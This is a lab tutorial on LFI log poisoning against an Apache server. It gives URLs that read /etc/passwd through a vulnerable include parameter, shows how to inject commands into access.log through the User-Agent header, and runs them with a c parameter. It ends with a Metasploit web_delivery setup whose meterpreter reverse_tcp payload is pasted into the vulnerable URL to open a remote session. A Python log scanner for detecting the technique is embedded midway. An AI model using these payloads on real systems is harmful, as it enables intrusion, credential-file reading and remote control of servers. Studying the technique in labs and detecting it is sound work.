In this article we demonstrate how a PHP file that uses the include function can lead to an LFI log injection (log poisoning) attack on a web server. Please read our previous articles “Beginner Guide to File Inclusion Attack (LFI/RFI)” and “Configure Web Server for Penetration Testing (Beginner Guide)”, which will help you configure your own web server and learn more about the LFI vulnerability.
Attacker: Kali Linux
Target: Ubuntu
Create a PHP file that allows the user to include a file through the file parameter. Using the file parameter, we can then execute a file that contains malicious code to gain unauthorized access to the target PC. Download the file from here.
I saved the PHP code given below in a text file named lfi.php on the desktop.
Now log in as “root” and create a folder “lfi” inside /var/www/html:
cd /var/www/html
mkdir lfi
Move the lfi.php file from the desktop to /var/www/html using the command given below:
mv /home/raj/Desktop/lfi.php .
Since we have added a PHP file with an include function inside /var/www/html, it can read the contents of any other file passed through that parameter, which leads to an LFI attack. Let’s demonstrate it by browsing to the following URL to read the password file:
Localhost/lfi/lfi.php?file=/etc/passwd
From the image you can observe that the above URL dumped the result shown below.
Now I will try to open the Apache access.log file through lfi.php in the browser. To do so, make access.log readable by the Apache user (apache2) and then include it.
To include access.log via the file parameter, enter the following URL in the browser:
192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log
From the image you can see the Apache log entries displayed in the browser. Now start Burp Suite to capture the request for the same web page.
Here you will see the intercepted request; we need to inject our cmd command into the User-Agent header by replacing the highlighted data.
Add the cmd command inside User-Agent and send the request with the GET parameter /lfi/lfi.php?file=/var/log/apache2/access.log&c=ps as shown in the image below. Then click Forward.
The page will dump the log data and also execute the command given through cmd. In the screenshot you can see both the log and the process list.
In the same manner, execute ifconfig through cmd to verify the network interfaces, or browse the following URL and view the result shown in the screenshot:
192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig
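As an added example (not part of the original article), here is a defender-side check that scans Apache access-log lines for the two traces this technique leaves behind: a PHP open tag written into the log through the User-Agent header, and a later request whose file parameter points at a log file, optionally with a c parameter. The log lines, regex and function names (analyse, scan) are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format, as a constructed regex for the sample lines below.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# The detector keys on the PHP open tag, not on what follows it.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)
LOG_PATHS = ('/var/log/', 'access.log', 'error.log', 'auth.log')


def analyse(line):
    """Return a list of finding strings for one access-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ['unparsed line']
    findings = []
    # Signal 1: PHP code being written into the log via the User-Agent header.
    if PHP_TAG_RE.search(m['ua']):
        findings.append('php-tag-in-user-agent')
    # Signal 2: the include parameter is abused (absolute path / traversal),
    # and in particular points at a log file so the poisoned entry is read back.
    qs = parse_qs(urlsplit(m['path']).query)
    for value in qs.get('file', []):
        if value.startswith('/') or '..' in value:
            findings.append('file-param-absolute-or-traversal')
        if any(p in value for p in LOG_PATHS):
            findings.append('file-param-targets-log')
            if 'c' in qs:
                findings.append('command-param-present:' + qs['c'][0])
    return findings


# Constructed sample lines: a normal request, the poisoning write, the execution read.
SAMPLE_LOG = [
    '192.168.1.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.10 - - [10/Oct/2023:13:56:01 +0000] "GET /lfi/lfi.php?file=/etc/passwd HTTP/1.1" 200 1024 "-" "<?php echo 1; ?>"',
    '192.168.1.10 - - [10/Oct/2023:13:56:20 +0000] "GET /lfi/lfi.php?file=/var/log/apache2/access.log&c=ps HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Map the index of each suspicious line to its findings."""
    hits = {}
    for i, line in enumerate(lines):
        found = analyse(line)
        if found:
            hits[i] = found
    return hits


if __name__ == '__main__':
    for idx, found in scan(SAMPLE_LOG).items():
        print(idx, found)
```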
If you find this kind of vulnerability in a web application, you can use the Metasploit framework to exploit the web server.
This module quickly fires up a web server that serves a payload. The provided
command will start the specified scripting language interpreter and then
download and execute the payload. The main purpose of this module is to quickly
establish a session on a target machine when the attacker has to manually type
in the command himself, e.g. Command Injection, RDP Session, Local Access or
maybe Remote Command Exec. This attack vector does not write to disk so it is
less likely to trigger AV solutions and will allow privilege escalations
supplied by Meterpreter. When using either of the PSH targets, ensure the
payload architecture matches the target computer or use SYSWOW64 powershell.exe
to execute x86 payloads on x64 machines.
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.0.104
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > exploit
Copy the highlighted text shown in the window below.
Paste the copied malicious code into the URL as shown in the image and execute it as the command. When the code executes you will get meterpreter session 1.
msf exploit(web_delivery) > sessions -i 1
meterpreter > sysinfo